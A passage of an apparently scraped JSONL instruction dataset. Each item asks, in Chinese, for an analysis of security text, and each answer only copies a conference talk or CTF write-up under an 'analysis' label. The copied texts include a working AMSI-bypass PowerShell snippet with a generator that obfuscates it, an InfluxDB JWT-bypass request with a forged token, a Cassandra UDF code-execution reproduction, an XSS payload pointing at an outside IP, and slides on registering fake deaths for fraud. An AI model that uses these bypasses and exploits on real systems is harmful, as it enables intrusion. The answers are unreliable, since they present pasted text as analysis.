Defining Wireless Threats 7/13/2002 Slide 11 Defcon 11 Defining the wireless threats  WarDriving  Se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport binascii, hashlib, time, string, sys, zlib, qrcode from pwn import * context.log_level=\"debug\" r=remote(\"ctf.sharif.edu\", 12432) time.sleep(0.5) r.recvline() r.recvline() s=r.recvline() s=s[-24:-2] r.recvline() wanted=s i=0 while True: i+=1 s=hex(i)[2:] s=(8-len(s))*\"0\"+s dig=bin(int(hashlib.md5(s).hexdigest()[:6], 16))[2:] dig=\"0\"*(24-len(dig))+dig if dig[:22]==wanted: c=hex(i)[2:] r.send( (8-len(c))*\"0\"+c ) break if i%500000==0: pass print i print r.recvline() #print s[:16] #key=s[16:-53] #print repr(key) #print s[-53:] data=r.recv() print \"Decompressed input:\" print zlib.decompress(data) qr=qrcode.QRCode(error_correction=qrcode.constants.ERROR_CORRECT_L, box_size=1, border=1) qr.add_data(sys.argv[1]) qr.make() qr.make_image().save(\"test.png\") data=zlib.compress(open(\"test.png\",\"rb\").read(), 9) r.send(data+\"\\x00\"*(200-len(data))) time.sleep(0.5) print r.recv()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Hacking US Traffic Control Systems Cesar Cerrudo @cesarcer CTO at IOActive Labs About me Hacker, vulnerability researcher, created novel exploitation techniques, dozens of vulnerabilities found (MS Windows, SQL Server, Oracle, etc.). Developed, sold exploits and 0day vulnerabilities (7-10 years ago) Run research and hacking teams, etc. CEO of software company CTO at IOActive labs Live in small city in third world country, far away from everything but I can hack US traffic control systems 2 Thanks Barnaby Jack Ruben Santamarta Mike Davis Mike Milvich Susan Wheeller Ian Amit Robert Erbes 3 How all started Researching different wireless devices used by traffic control systems found news that London was going to implement wireless devices for traffic detection After some research found the devices vendor name Vendor ended up being interesting target, widely deployed +250 customers in 45 US States and 10 countries 500,000+ Wireless sensors deployed worldwide, most of them on the US Countries include US, United Kingdom, China, Canada, Australia, France, etc. After reading available documentation I had strong feeling the devices were insecure 4 How all started Getting the devices Social engineered vendor Ship them to Puerto Rico and traveled with them back and forth to the US from Argentina several times without any problems 5 The devices: Wireless Sensors Installs in small hole using hammer or core drill in less than 10 minutes Rugged mechanical design, 10 years of battery life TI CC2430 RF transceiver IEEE 802.15.4 system-on-chip 2.4-GHz TI MSP430 MCU (microcontroller) 16-bit RISC CPU , i386 Linux (probably TinyOS RTOS) The devices: Wireless Sensors The devices: Access Point Processes, stores, and/or relays sensor data (uCLinux) 66 MHz 5272 Coldfire processor, 4 MB of flash memory, and 16 MB of DRAM. Contact closure to traffic controller, IP (fiber or cellular) to central servers, PoE Supports as many sensors as necessary, Can serve as IP router for peripherals (video ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport numpy as np from PIL import Image import sys import math import glob import scipy.misc import pytesseract import subprocess import matplotlib.pyplot as plt import random def captcha(image): letters = \"ABCDEF1234567890\" let = {} for l in letters: f = Image.open(\"charset/%c.png\" % l).convert(\"L\") f = np.array(f.getdata(), dtype=np.uint8).reshape(f.size[::-1]) let[l] = f < 255 chars = [] while True: #plt.imshow(image) #plt.show() best = [] for l in let: letter = let[l] area = letter.shape[0] * letter.shape[1] i = 9 #for i in range(image.shape[0] - letter.shape[0] + 1): for j in range(image.shape[1] - letter.shape[1] + 1): diff = image[i:i+letter.shape[0], j:j+letter.shape[1]]  letter diff = np.sum(diff) / float(area) best.append((diff, l, i, j)) best.sort() diff, l, i, j = best[0] if diff > 0.1: break chars.append((j, l)) print diff, \"\".join(c[1] for c in sorted(chars)) image[i:i+let[l].shape[0], j:j+let[l].shape[1]] = 0 return \"\".join(c[1] for c in sorted(chars)) def solve(directory): files = sorted(glob.glob(directory + \"/*\")) images = [] for i, f in enumerate(files): f = Image.open(f).convert(\"L\") f = np.array(f.getdata(), dtype=np.uint8).reshape(f.size[::-1]) images.append(f) images.append(np.full((1400, 10), 255)) images = [images[-1]] + images n = len(images) weights = {} for i in range(n): for j in range(n): for ri in range(2): for rj in range(2): if ri == 0: l = images[i][:, 9] else: l = images[i][::-1, 0] if rj == 0: r = images[j][:, 0] else: r = images[j][::-1, 9] weights[(i, j, ri, rj)] = np.sum(np.abs(l - r)) with open(\"/tmp/spec\", \"w\") as f: f.write(str(n)+\"\\n\") for i in range(n): for j in range(n): for ri in range(2): for rj in range(2): f.write(str(weights[(i, j, ri, rj)])+\"\\n\") ss = subprocess.check_output([\"./a.out\"]) ss = [int(c) for c in ss.split()] perm = ss[:n] rots = ss[n:] imgs = [] for i in perm: imgs.append(images[i]) for i, r in enumerate(rots): if r: imgs[i] = np.rot90(imgs[i], 2) image = np.concatenate(imgs, axis=1) image = image[680:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<!DOCTYPE html SYSTEM \"http://www.thymeleaf.org/dtd/xhtml1-strict-thymeleaf-spring4-4.dtd\"> <html xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:th=\"http://www.thymeleaf.org\"> <head> <title>Users</title> <meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\" /> <link rel=\"stylesheet\" href=\"//maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css\" /> <link rel=\"stylesheet\" th:href=\"@{/css/style.css}\" type=\"text/css\" /> </head> <body> <h1>Users</h1> <nav> <ul class=\"pagination\" th:with=\"total = ${users.totalPages}\"> <li th:if=\"${users.hasPrevious()}\"> <a th:href=\"@{/users(page=${users.previousPageable().pageNumber},size=${users.size})}\" aria-label=\"Previous\"> <span aria-hidden=\"true\">&laquo;</span> </a> </li> <li th:each=\"page : ${#numbers.sequence(0, total - 1)}\"><a th:href=\"@{/users(page=${page},size=${users.size})}\" th:text=\"${page + 1}\">1</a></li> <li th:if=\"${users.hasNext()}\"> <a th:href=\"@{/users(page=${users.nextPageable().pageNumber},size=${users.size})}\" aria-label=\"Next\"> <span aria-hidden=\"true\">&raquo;</span> </a> </li> </ul> </nav> <ol> <li th:each=\"user, it : ${users}\" th:with=\"index = ${it.count}\" th:text=\"${user.username + ' - ' + user.password}\" th:value=\"${users.number * users.size + index}\">Username</li> </ol> <form method=\"post\" role=\"form\" class=\"gb-form\" id=\"form\" th:action=\"@{/users(page=${page},size=${users.size})}\" th:object=\"${userForm}\"> <ul th:if=\"${#fields.hasErrors('*')}\" class=\"errors\" > <li th:each=\"error : ${#fields.errors('*')}\" th:text=\"${error}\" class=\"text-danger\">Input is incorrect</li> </ul> <div class=\"form-group\"> <label for=\"username\">Username</label><br /> <input type=\"text\" th:field=\"*{username}\" class=\"form-control\" th:errorclass=\"fieldError\" required=\"required\" /> </div> <div class=\"form-group\"> <label for=\"password\">Password</label><br /> <input type=\"password\" th:field=\"*{password}\" class=\"form-control\" th:errorclass=\"fieldError\" required=\"required\" /> </div> <div class=\"form-group\"> <label for=\"repeatedP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMEMORY FORENSICS 识黑寻踪 之 内存取证 演讲人伍智波 SkyMine 中国网安  广州三零卫士 - 安全专家 2 0 1 8 目录 CONTENTS PART 01 内存取证的起源与发展 01 PART 02 内存管理机制简述 02 PART 03 如何获取内存数据 03 PART 04 内存分析的工具 04 PART 05 犯罪取证案例分析 05 KEYWORD : 应急响应数字取证行为溯源 THE ORIGIN AND DEVELOPMENT OF MEMORY FORENSICS PART 01 内存取证的起源与发展 2002年 2005年 2006年 2007年 2009年 2010年 2011年 美国空军特别调查办公室的安全研究员于2002年发表 的DFRWS主题报告中曾经提到为了处理网络应急响应所 面临的问题需要调查易失性内存RAM的信息以全 面而准确地获取网络攻击和网络犯罪证据这是内存取证概 念首次被提出 DFRWS数字取证研究会于2005年夏季发起针对 Windows操作系统的内存取证分析挑战赛通过分析一个 Windows 2000的物理内存转储文件要求参赛者提取该文件 中所包含的隐匿进程及其隐匿方式网络攻击者如何攻击以及 何时何处发起攻击等相关攻击链信息这是真正意义上的内 存取证研究的开始 USA 2005 2002年 2005年 2006年 2007年 2009年 2010年 2011年 安全研究员Andreas Schustert于2006年提出了在 Windows内存镜像文件中寻找进程和线程的方法并使用Perl 语言开发了PTFinder该工具可以找到Windows内存文件的 进程和线程信息 PTFinder Andreas Schustert 2002年 2005年 2006年 2007年 2009年 2010年 2011年 纽约大学计算机科学与工程系助理教授Brendan Dolan- Gavitt于2008年通过分析Windows的内存获取了注册表信息 并通过提取注册表信息来判断系统是否受到了攻击同年 DFRWS继2005年的Windows内存取证分析挑战赛后又发起了 针对Linux系统的内存取证分析挑战赛 2002年 2005年 2006年 2007年 2009年 2010年 2011年 2009年加拿大计算机安全研究员Seyed Mahmood Hejazi在DFRWS上提出了从Windows内存中提取敏感信息的 方法同年Zhang Shuhui等人提出了一种Kernel Processor Control RegionKPCR结构的提取方法学界 对内存取证的研究开始初有成果 2002年 2005年 2006年 2007年 2009年 2010年 2011年 DESCRIPTION OF THE MEMORY MANAGEMENT MECHANISM PART 02 内存管理机制的简述 ① 虚拟地址空间管理机制 ② 物理页面管理机制 ③ 地址转译和页面交换机制 Windows三大内存管理机制 Windows为满足多进程工作的需要采用虚拟地址空间 的机制来进行内存管理每个进程拥有逻辑独立的内存空间 各进程地址空间相互隔离互不干扰 而这些虚拟地址空间是由VADVirtual Address Descriptor 虚拟地址描述符来管理的VAD对象描述的是一些连续的 地址空间范围但由于在整个内存地址空间当中保留或提 交的地址范围可能是不连续的所以Windows会使用AVL树 的方式来管理VAD对象形成VAD树 因此借助VAD不仅能获取进程所使用的虚拟地址空 间信息还可以获取到该进程的其他相关信息 ① 虚拟地址空间管理机制 ② 物理页面管理机制 ③ 地址转译和页面交换机制 Windows三大内存管理机制 由于Windows的进程都是在物理内存中执行的因此 Windows需要管理物理地址所在的物理内存页面Windows系 统使用PFNPage Frame Number Database页帧数据库来 描述物理内存各页面的状态PFN数据库中的每个项都分别 对应一个物理页面记录了该页面的一些信息 此外Windows还维护着一组链表分别将相同类型的 的页面链接起来主要包括零化链表空闲链表备用链表 修改链表坏页面链表等 ① 虚拟地址空间管理机制 ② 物理页面管理机制 ③ 地址转译和页面交换机制 Windows三大内存管理机制 Windows的的地址转译机制可将进程中所使用的虚拟 地址转换为物理内存中的物理地址从而完成内存数据的定 位为获取内存数据提取支持 当运行的进程所需的内存大于计算机所安装的RAM时 Windows将会采用页面交互机制来处理要么进程使用了某 个尚未得到物理页面的虚拟地址要么进程", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# InfluxDB JWT 认证绕过漏洞CVE-2019-20933 InfluxDB是一款著名的时序数据库其使用jwt作为鉴权方式 在其1.7.6版本以前默认设置jwt的认证密钥`shared-secret`为空字符串导致攻击者可以伪造任意用户身份在InfluxDB中执行SQL语句 参考链接 - https://www.komodosec.com/post/when-all-else-fails-find-a-0-day - https://github.com/influxdata/influxdb/issues/12927 - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 - https://docs.influxdata.com/influxdb/v1.7/administration/config/#http-endpoints-settings ## 漏洞环境 执行如下命令启动InfluxDB 1.6.6 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8086/debug/vars`即可查看一些服务信息但此时执行SQL语句则会出现401错误 ![](1.png) ## 漏洞复现 我们借助<https://jwt.io/>来生成jwt token ``` { \"alg\": \"HS256\", \"typ\": \"JWT\" } { \"username\": \"admin\", \"exp\": 1676346267 } ``` 其中`admin`是一个已经存在的用户`exp`是一个时间戳代表着这个token的过期时间你需要设置为一个未来的时间戳 最终生成的token ![](2.png) 发送带有这个jwt token的数据包可见SQL语句执行成功 ``` POST /query HTTP/1.1 Host: your-ip Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoyOTg2MzQ2MjY3fQ.LJDvEy5zvSEpA_C6pnK3JJFkUKGq9eEi8T2wdum3R_s User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 22 db=sample&q=show+users ``` ![](3.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nZCTF writeup Nu1L Misc: Russian zips 我的世界的东西 Zctf{4t1Ve_!} Sign in 公众号回复 flag misc400 stegsolve 看图片发现这个 文件末尾有一串 base64解密得到一个损坏的压缩包 修复后解压发现很多 txt有一个 start打开是乱码但是看内容前几个字符发现是 bz2 的文件头把后缀改成 bz2 就可 以解压了发现还有一个 txt 指向下一个 txt于是把所有的 txt 改成 bz2在 windows 下批量解压然后在 linux 下 cat 所有文件直接得到了密码然后解压 flag.rar 得到密 码 Web: Web100 .index.php.swp 然后 substr 后的数值是 0e 开头典型的弱类型比较写个脚本就 ok Web100-find my eyes 有一个联系管理的地方在textarea的地方可以xss过滤了很多根据csp看到只能利用script 实现绕过想到以前看到过pkav的一个payload拿过来改改过滤了#用@替代过滤了冒 号所以最终payload是 Name=albertchang&Email=albert123@21.com&Team=aaaaaaaaasdsadsads&textarea=<script>// @ sourceMappingURL=//198.35.45.72/</script> Web200apk 抓包在 burp 发包发现当输入为 1 OR 1=1#时返回 admin猜测为注入 于是把加密算法分出来经过测试发现过滤很严最后用 desc 成功盲注密码为 CleverBoy123 然后进入第二层 mail.php猜测是 PHPMailer 的洞一发 exp 打过去拿到 flag: RE easy reverse 一个 dll调用 get_string 进入程序流程将输入加密后与程序中保存的结果对比由于加 密是两个字符一个单位爆破可以非常容易的得到对应关系然后解密即可 dll 调用可以使用 python 的 ctypes 库完成之后 ida attach 找到对应 dll 调试即可 算结果用的脚本 remap = {0L: 27499, 1L: 19098, 3L: 2467, 4L: 18454, 6L: 10763, 7L: 171 63, 10L: 2771, 11L: 12963, 12L: 23111}#太多不写了 b = [0xbf,0xf1,0x6a,0x2c,0x10,0xb,0x16,0x59,0xba,0x3a,0x8c,0x49,0x5,0x1b, 0x4,0xe2,0x85,0xd5,0xc2,0xfc,0xd7,0x9b,0xe9,0x42] output= \"\" for i in range(0,len(b),2): out = remap[(b[i]<<8)|(b[i+1])] print (b[i]<<8)|(b[i+1]) output+=chr(out&0xff) output+=chr(out>>8) print output QExtend 程序有两次校验第一层为汉诺塔要把一个形如 aa cc dd bb ee 的汉诺塔的圆盘全部移动到中间一个柱子上且总步数不能超过 26 这步直接暴力搜索即可获取所有路线大概有十几条 第二层为判断输入去除 ZCTF{}后进行 md5 得到的结果是否与程序中保存的一致 第一步限定条件过于简单导致有大量输入可以通过校验全部算一遍 md5 不现实暂时卡 住 第二天提示最优解于是找出最短的执行序列 steps = [['!', '1', 'A', 'Q', 'a', 'q'], ['&', '6', 'F', 'V', 'f', 'v'], ['$', '4', 'D', 'T', 'd', 't'], ['#', '3', 'C', 'S', 'c', 's'], ['&', '6', 'F', 'V', 'f', 'v'], ['%', '5', 'E', 'U', 'e', 'u'], ['\"', '2', 'B', 'R', 'b', 'r'], ['!', '1', 'A', 'Q', 'a', 'q'], ['%', '5', 'E', 'U', 'e', 'u'], ['\"', '2', 'B', 'R', 'b', 'r'], ['#', '3', 'C', 'S', 'c', 's'], ['$', '4', 'D', 'T', 'd', 't'], ['\"', '2', 'B', 'R', 'b', 'r'], ['!', '1', 'A', 'Q', 'a', 'q'], ['%', '5', 'E', 'U'", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## URE (Crypto, 100p) Universal ReEncryption ###ENG [PL](#pl-version) We have to change ciphertext in such way, that after decrypting plaintext is unchanged: ![](task.png) We need to think about what task authors really want from us - in mathematical terms. `r` and `s` are random numbers, so if we substitute them with another numbers plaintext will surely be unchanged. So if we change `(gr, hr, gs, mhs)` to `(gx, hx, gy, mhy)` (for any x != r, y != s) then task is solved. We tried few possibilities, but after not very long time we came to good substitution: r -> r+r s -> r+s Our solver demonstrating that substitution (basic algebra is enough to prove it right) ```python def solve(a, b, c, d, p): # a = gr # b = hr # c = gs # d = m*gxs return [x%p for x in [ a*a, # g(r+r) b*b, # h(r+r) a*c, # g(r+s) d*b # m*h(r+s) ]] ``` And our solution a': 3287406693040037454338117703746186185132137914785835752950604845777415758360615360784432898128185782894436154048036406523549199332371675403330587908658389 b': 3106361558536896198315490627917020257039985078045091925325167930756012775219021778274538316287957153184501076513389822529518252243096913454042609623430979 c': 2705749471178411581710759303917406711797848509917528975018497036876024862091214580659339932929912633743841281275200381261759865873903109533343463983599973 d': 5373483039142295785146805049046423326555571326092245347871091138664843112902523040473342171017639501524961161720758693343930112103298610080325764680063048 ###PL version Naszym zadaniem jest zmiana ciphertextu tak, aby po zdeszyfrowaniu jego zawartośc (plaintext) się nie zmieniła: ![](task.png) Można się zastanowić czego dokładnie chcą od nas twórcy zadania w \"matematycznych\" słowach. `r` i `s` są liczbami losowymi, więc jeśli uda nam się je zamienić, otrzymamy jednocześnie rozwiązanie zadania. Tzn. jeśli bylibyśmy w stanie zamienić `(gr, hr, gs, mhs)` na `(gx, hx, gy, mhy)` (dla jakiegoś x != r, y != s) to mamy rozwiązanie zadania. Przy rozwiązaniu było trochę ko", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n对Bypass AMSI混淆篇中的代码浅析 L.N.师傅在最后给出了我一个代码然而我发现我根本看不懂虽然拿来就用确 实很爽但是换个场景过段时间或许就不可行了于是学习了一下下面这段 代码到底在干吗看了一下觉得关键代码是 $c=[string](0..37|%{[char] [int](29+($a+$b).substring(($_*2),2))})-replace \" \" 于是对这串代 码做学习 # 0x01 代码解析 要弄懂的就是下面这几个问题 1.0..37|%{}其实这个感觉猜也能猜出来循环的一种写法,循环38次 2. $_ 是个啥说实话一开始我也弄不明白这到底是什么写法后来直接就是在 powershell里面写一个 $a=\"5492868772801748688168747280728187173688878280688776828\" $b=\"1173680867656877679866880867644817687416876797271\" //对System.Management.Automation.AmsiUtils进行解码 $c=[string](0..37|%{[char][int](29+ ($a+$b).substring(($_*2),2))})-replace \" \" $d=[Ref].Assembly.GetType($c) //对amsiInitFailed进行解码 $e=[string](38..51|%{[char][int](29+ ($a+$b).substring(($_*2),2))})-replace \" \" $f=$d.GetField($e,'NonPublic,Static') //组合起来执行 $f.SetValue($null,$true) 0..10|%{echo($_)} 似乎是获取当前循环的值 知道了这个接着弄懂这个语句 主要就是 substring 这个函数以及 $_*2,2 在这里是做什么的 原来就是 取两位数 出来其实也不难理解当 $_=0 时取两位( [0] [1] )当 $_=1 时肯定需要乘以2在往后取两位,这样才能取出来 [2] [3] 以此类推 3.就是 -replace \" \"了这个似乎是powershell的一个特性 可以看到在转换之后每个字符中都会出现空格 这也是为什么我们要去掉空格的原 因 4.29+..... ASCII码中对于字母是有两位数字和三位数字的而咱们现在的这个程序只能取出两 位数字所以需要把数字全部转到两位数字的范畴 ($a+$b).substring(($_*2),2)) $a=\"546579\" 0..2|%{echo($a.Substring(($_*2),2))} 5.$a,$b怎么来的每个字符转ASCII再减去29最后把结果随机分割成两部分 # 0x02 代码实现 最后写一个简单的python脚本(可能脚本写的比较不雅观但至少达到了可以用的境 界) 最后生成一下 payload1='System.Management.Automation.AmsiUtils' payload2='amsiInitFailed' key=29 #偏差是多少 比如这里是29 payload=payload1+payload2 result='' for i in payload: result+=str(ord(i)-key)#ASCII每个字符再减去key的值 print('$a=\"'+result[0:len(result)//2]+'\"')#分割这里对半分的注意在 这里面的除法需要两个/ print('$b=\"'+result[len(result)//2:]+'\"') print('$c=[string](0..'+str(len(payload1)-1)+'|%{[char][int] ('+str(key)+'+($a+$b).substring(($_*2),2))})-replace \" \"')#解码语 句应用到别的bypass场景或许也可以 print(\"$d=[Ref].Assembly.GetType($c)\") print('$e=[string] ('+str(len(payload1))+\"..\"+str(len(payload1)+len(payload2)-1)+'|% {[char][int]('+str(key)+'+($a+$b).substring(($_*2),2))})-replace \" \"')#关键解码语句 print(\"$f=$d.GetField($e,'NonPublic,Static')\") print(\"$f.SetValue($null,$true)\") 效果 可以随便改变这个 2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSocially owned by the cloud Defcon 17 1 Where is our data?  Bankboxes and filing cabinets.  On a computer hard drive at home  On dvd in storage  Stored in private holes in the internet  Stored in public so everyone can see it 2 Evolution of the private sphere  Close family / friends  BBS / Cyberfriends  Internet 3 Evolution of communication  In person communication  Letters / Snail mail  Email  IM  Social networks / Myspace / Facebook  Twitter 4 Where is our data  Do you know where your provider stores the data?  What jurisdiction its under?  Can you remove it? Can you delete it? 5 Who owns the data?  You?  Them?  What if you die? 6 I wanted answers Amazon Amazon Kindle Flickr Smugmug Jungledisk match.com Myspace Facebook 7 Answers  Still awaiting responses 8 Trends  The data becomes assets for very large companies  Like anything on the internet removing it can be really hard, even if the company allows it, backups, and online copies might exist.  Your personal data is valuable and you give it up for free 9 Advice and activism  Public cloud and private clouds for business  We should get private storage of all our data, and decide what to display on sites.  Sites should be consumers of data we provide and own, not storage providers and consumer of it 10 more advice  The DRM we all love to loathe today, as companies enforce draconicen rules upon what we lease from them, should in the future be exploited by us all to protect our life sphere and control the access for sites who wish to lease our content. 11 even more advice  Social sites make their money off of us, off or our content, our sweat and our work.  Its time to take control back. 12", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlitzableiter  BETA Release Countering Flash Exploits Felix FX Lindner DEFCON XVIII Agenda Motivation RIA Basics Flash (in)Security Flash Malware Flash Internals Defending the Poor Defense approach Implementation Current functionality Measurements & Results Next steps Motivation Project initiated in late 2008 by the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik) Review of the current Rich Internet Application security situation Adobe Flash turned out to be far behind the curve in terms of security compared to other technologies That posed the question whether that fact could be helped Preferably without firing everyone at Adobe Defending the Poor Who cares about Flash security? Some of the end users Apple users running on PowerPC machines: The Adobe Flash Player 10.1 release, expected in the first half of 2010, will be the last version to support Macintosh PowerPC-based G3 computers. Adobe will be discontinuing support of PowerPC-based G3 computers and will no longer provide security updates after the Flash Player 10.1 release. This unavailability is due to performance enhancements that cannot be supported on the older PowerPC architecture. People who dont want to get owned while surfing pr0n Web site operators Web sites that display advertisement banners (Heise or eWeek anyone?) Owners of web sites allowing users to upload files Defending the Poor Rich Internet Applications Rich Internet Applications (RIA) are in general programmatic enhancements to the regular web browser that allow for enhanced interactivity, communication and media display. Prominent members *: Rich Internet Application Basics * Google Native Client is intentionally not mentioned here. Common Properties of RIA Environments RIA functionality is implemented as plug-in for web browsers Plug-in provides a runtime environment with one or more virtual machines that execute byte code specific to that RIA platform RIA runtimes additionally provide me", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n兵家必爭之地 Nanika PDF created with pdfFactory Pro trial version www.pdffactory.com  在防毒與惡意軟體間的一往一來就是一場 激烈的戰爭  在一黑一白對抗之中各有輸贏 PDF created with pdfFactory Pro trial version www.pdffactory.com  安全需要對於任何風險都略懂  知彼知己百戰不殆不知彼而知己一 勝一負不知彼不知己每戰必殆  知識就是力量 PDF created with pdfFactory Pro trial version www.pdffactory.com 你懂入侵 你懂OS 懂WEB PT? PDF created with pdfFactory Pro trial version www.pdffactory.com 守方優劣勢  先常駐在系統,掌握各個 關鍵關口,並且對於任何 變動都可以瞭若指掌,擁 有龐大的資源,發現新攻 擊方式會使用各種技巧封 阻  以穩定度為核心並且不能 作太細膩的檢查影響效能, 不能使用不穩定的先進技 術,守勢地圖直接攤在外 面讓人研究 PDF created with pdfFactory Pro trial version www.pdffactory.com 掌握關鍵關口 惡意軟體 哇靠! 早就 跟你說過要 走別條路 PDF created with pdfFactory Pro trial version www.pdffactory.com 守勢地圖公開 前線包括 Ring0防護 交通要道進 行多少Hook 重要據點 有多少人 防護 通信兵如 何通信 最後防 線 戰略地圖 PDF created with pdfFactory Pro trial version www.pdffactory.com 攻方優劣勢  各種技巧不需要以穩定 為核心,需依照守勢地圖 找新計謀突破,當守勢很 完備的時候則需要使用 些奇淫技巧  沒辦法準確的瞭解攻擊 目標的環境,常常一公開 新技巧馬上會被封阻,沒 辦法一勞永逸 PDF created with pdfFactory Pro trial version www.pdffactory.com 必爭之地 FileFilter(最後防線) NotifyCallBack(通信) IAT EAT Inline(重要據點) SystemCall(交通要道) Ring0(前線) PDF created with pdfFactory Pro trial version www.pdffactory.com Ring0(突破前線)  替換REG  替換檔案  \\Device\\PhysicalMemory  ZwLoadDriver  ZwSystemDebugControl  ZwSetSystemInformation  Kernel Bug  . PDF created with pdfFactory Pro trial version www.pdffactory.com 在這裡等了半天 什麼惡意軟體都 沒出現,系統應該 很安全吧 PDF created with pdfFactory Pro trial version www.pdffactory.com 惡意軟體 嘿嘿 走後門 我最在行 PDF created with pdfFactory Pro trial version www.pdffactory.com 兵不厭詐 這是戰爭 PDF created with pdfFactory Pro trial version www.pdffactory.com 突破前線後要怎樣進攻  正面突破  各個擊破 PDF created with pdfFactory Pro trial version www.pdffactory.com 正面突破(MmUnloadSystemImage) PDF created with pdfFactory Pro trial version www.pdffactory.com 各個擊破  分析守勢地圖後精 準突破 PDF created with pdfFactory Pro trial version www.pdffactory.com SystemCall(交通要道)  SSDT (實做一整個Function)(還原)  Inline Hook(實做一整個Function)(還原)  攔截與還原的無窮迴圈 PDF created with pdfFactory Pro trial version www.pdffactory.com PDF created with p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nauthor:Y4er 环境 Cassandra 4.0.0 漏洞分析 先说原理enable_user_defined_functions_threads为false时会隐式禁用security-manager导致 可以通过udf执行java代码 官方公告 https://lists.apache.org/thread/r0593lq5dto52fgw8y2vvcydc2tdyq40 使用以下配置 enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false 攻击者有可能在主机上执行任意代码搜了下文档发现有一个function的功能 用户可以创建udf(用户自定义函数)来执行自定义代码 默认支持java或者javascript两种简单看了下代码 org.apache.cassandra.cql3.functions.UDFunction#create 这个地方会创建对应的代码引擎这两 个引擎都继承自UDFunction并且被设置了一个自定义的classloader UDFunction.udfClassLoader 这个classloader找class时会进行过滤 secureResource函数定义如图 会遍历黑白名单要求既要在白名单中并且不在黑名单中 白名单 黑名单 可以用 java.lang.System.load('/tmp/aaa.so'); 来加载恶意的so文件达到执行命令的目的 复现 CREATE KEYSPACE test WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 3}; CREATE TABLE tab (cmd text PRIMARY KEY) WITH comment='Important biological records'; CREATE OR REPLACE FUNCTION exec1(cmd text) RETURNS NULL ON NULL INPUT RETURNS text LANGUAGE javascript AS $$ java.lang.System.load('/tmp/aa.so'); $$; select test.exec1(cmd) from tab; 如果你一直报 java.security.AccessControlException: access denied 的异常 就是没改conf/cassandra.yaml配置文件要加上这一行 so文件怎么生成参考园长的文章 https://www.javaweb.org/?p=1866 参考 1. https://lists.apache.org/thread/r0593lq5dto52fgw8y2vvcydc2tdyq40 2. https://cassandra.apache.org/doc/latest/cassandra/cql/functions.html 3. https://tttang.com/archive/1436/ 4. 园长的文章 文笔垃圾措辞轻浮内容浅显操作生疏不足之处欢迎大师傅们指点和纠正感激不尽", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nChris Rock I WILL KILL YOU & BIRTH YOU How to kill someone and bury the body yourself without a shovel & How to make Babies and then Harvest them Chris Rock chris@kustodian.com Why research DEATH Death Process behind the curtain Globally U.S. Certificate of Death Details about the Dead Person Medical Practitioner Cause of Death Funeral Director IDIOTS GUIDE for Doctors AUS Medical Certificate Cause of Death Online US Register a Death online  EDRS Electronic Death Registration System US EDRS Registration Is my Doctor real or fake? New Zealand https://www.mcnz.org.nz/support-for-doctors/list-of-registered-doctors Australia https://www.ahpra.gov.au USA: California http://www.mbc.ca.gov/Breeze/License_Verification.aspx United Kingdom http://www.gmc-uk.org/doctors/register/LRMP.asp USA: California Australia EDRS Online  U.S.A Dr G Medical Examiner Coroner Death Process When I grow up I want to be a Funeral Director Getting rid of the Body Fun Director  Australia Online Application Online Application Success Register LOTS of Deaths Register your Death Funeral Director Online - EDRS Becoming a Funeral Director -UK Becoming a Funeral Director -USA California & Colorado Nevada: $375 + Exam IDIOTS GUIDE for Fun Directors Death Process Wills and Probate DIY WILL KIT DIY PROBATE PETITION Reasons for killing someone Hinder  Kill off your investigating detectives. Subpoena and indictments cant be issued by a dead person. Dead people find it difficult to travel.  Kill your opposing lawyer, the judge or IRS audit officer to slow them down Financial - $$$$$  Kill yourself. Enjoy your Life Insurance whilst your alive. No more sinking your boat at sea, or hiding out in Mexico. Start with a new Identification.  Kill your elderly parents to get their estate. They just wont die quick enough. Revenge  Revenge on your ex-wife/girlfriend/partner. They will be dead and not even know it.  Your boss is a asshole. As their Executor shut down their bank accounts, drivers license, phone plan, cab", "category": "text_analysis", "source": "security_papers"}
